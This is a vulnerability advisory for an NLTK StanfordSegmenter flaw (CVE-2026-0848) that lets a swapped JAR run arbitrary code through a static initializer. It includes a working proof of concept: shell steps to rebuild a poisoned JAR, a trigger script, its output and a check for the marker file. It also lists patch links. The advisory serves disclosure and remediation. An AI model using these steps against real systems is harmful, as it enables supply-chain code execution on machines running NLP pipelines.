
nltk.tokenize.StanfordSegmenter dynamically loads external Java .jar files without verification or sandboxing. If an attacker can supply or replace the JAR (e.g., a poisoned model download, MITM package swap, or dependency poisoning), arbitrary Java bytecode executes at import time.
| Field | Details |
|---|---|
| CVE ID | CVE-2026-0848 |
| Package | nltk (Natural Language Toolkit) |
| Registry | PyPI |
| Affected Versions | <= 3.9.2 |
| Vulnerability Type | CWE-20: Improper Input Validation |
| CVSS Score | 10.0 (Critical) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Changed |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
| Reported On | December 6, 2025 |
| CVE Published | March 2026 |
| Supported By | Palo Alto Networks / Prisma AIRS |
nltk.tokenize.StanfordSegmenter dynamically loads external Java .jar files via subprocess without performing any integrity verification, signature checking, or sandboxing. The class accepts fully attacker-controlled parameters including path_to_jar, path_to_model, path_to_dict, and java_class, and passes them directly to a java -cp invocation.
If an attacker can supply or replace the JAR file — through a poisoned model download, a man-in-the-middle package swap, dependency poisoning, or a corrupted release mirror — arbitrary Java bytecode executes at class-load time via the JVM's static initializer mechanism. This constitutes a supply-chain Remote Code Execution vulnerability and fully escapes the Python runtime.
| File | Lines | Description |
|---|---|---|
nltk/tokenize/stanford_segmenter.py | L53–L118 | Accepts attacker-controlled path_to_jar, path_to_model, path_to_dict, and java_class with no validation |
nltk/internals.py | L220–L300 | Launches Java execution directly with user-controlled JAR path and classpath, no sandboxing or checksum verification |
nltk/internals.py | L109–L152 | subprocess.Popen() executes Java with unvalidated classpath input, allowing the JVM to load arbitrary bytecode and run static initializers |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Changed |
| Confidentiality | High |
| Integrity | High |
| Availability | High |
Successful exploitation grants an attacker full control over the system running the NLTK segmentation process:
Runtime.getRuntime().exec() or ProcessBuilder to run arbitrary shell commands| Scenario | Impact |
|---|---|
| ML researcher loads a pretrained segmenter from the internet | Remote attacker gains code execution |
| Organization downloads a corrupted Chinese segmentation model ZIP | Malware executes inside production NLP pipeline |
CI/CD server installs model via wget/unzip from a non-HTTPS mirror | Full environment compromise |
| Dependency takeover or poisoned release mirror | Complete supply-chain RCE |
This vulnerability affects any NLP workflow using StanfordSegmenter, including chatbots, LLM preprocessing pipelines, dataset segmentation, document classification, and production inference services.
This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.
cd stanford-segmenter-2020-11-17/merged
jar xf ../stanford-segmenter-4.2.0.jar
rm -rf edu/stanford/nlp/ie/crf/CRFClassifier.class
cat << 'EOF' > edu/stanford/nlp/ie/crf/CRFClassifier.java
package edu.stanford.nlp.ie.crf;
public class CRFClassifier {
static {
try {
System.out.println("\nPayload executed — Code ran on class load!\n");
Runtime.getRuntime().exec("touch /tmp/pwned_hijack");
} catch(Exception e){}
}
public static void main(String[] args){}
}
EOF
javac edu/stanford/nlp/ie/crf/CRFClassifier.java
jar cfm exploit.jar META-INF/MANIFEST.MF *
cp exploit.jar ../stanford-segmenter.jar
mkdir merged && cd merged
javac Payload.java
jar xf ../stanford-segmenter-4.2.0.jar
jar xf ../stanford-corenlp-4.2.0/stanford-corenlp-4.2.0.jar
jar cfm exploit.jar META-INF/MANIFEST.MF *
jar uf exploit.jar Payload.class
cp exploit.jar ../stanford-segmenter.jar
cd ..
# test.py
from nltk.tokenize.stanford_segmenter import StanfordSegmenter
print("[+] Triggering payload via modified Stanford JAR...")
seg = StanfordSegmenter(
path_to_jar="stanford-segmenter.jar",
path_to_sihan_corpora_dict="./data/",
path_to_dict="./data/dict-chris6.ser.gz",
path_to_model="./data/pku.gz",
java_class="edu.stanford.nlp.ie.crf.CRFClassifier",
encoding="utf-8"
)
print("[+] Running segmentation...")
print(seg.segment("我爱自然语言处理"))
Output:
[+] Triggering payload via modified Stanford JAR...
Payload executed — Code ran on class load!
[+] Running segmentation...
我 爱 自然语言 处理
Confirm RCE:
ls /tmp | grep pwned_hijack
# pwned_hijack
The vulnerability exists across two files:
stanford_segmenter.py — The StanfordSegmenter class constructor accepts path_to_jar, path_to_model, path_to_dict, and java_class as plain string arguments and forwards them directly to the Java execution layer without performing any of the following:
java_class parameter against a known-safe set of class namesinternals.py — The java() helper constructs and launches a subprocess.Popen() call with the user-supplied classpath. The JVM immediately loads all classes in the provided JAR, executing any static initializer blocks before the application logic runs. There is no sandbox, no integrity gate, and no mechanism to prevent execution of injected bytecode.
The vulnerability has been fully resolved in the upstream NLTK repository.
| Resource | Link |
|---|---|
| Central Security Fix (all CVEs) | https://github.com/nltk/nltk/pull/3522 |
| Researcher's initial fix PR | https://github.com/nltk/nltk/pull/3477 (merged) |
Upgrade to a patched version of NLTK as soon as it is available on PyPI.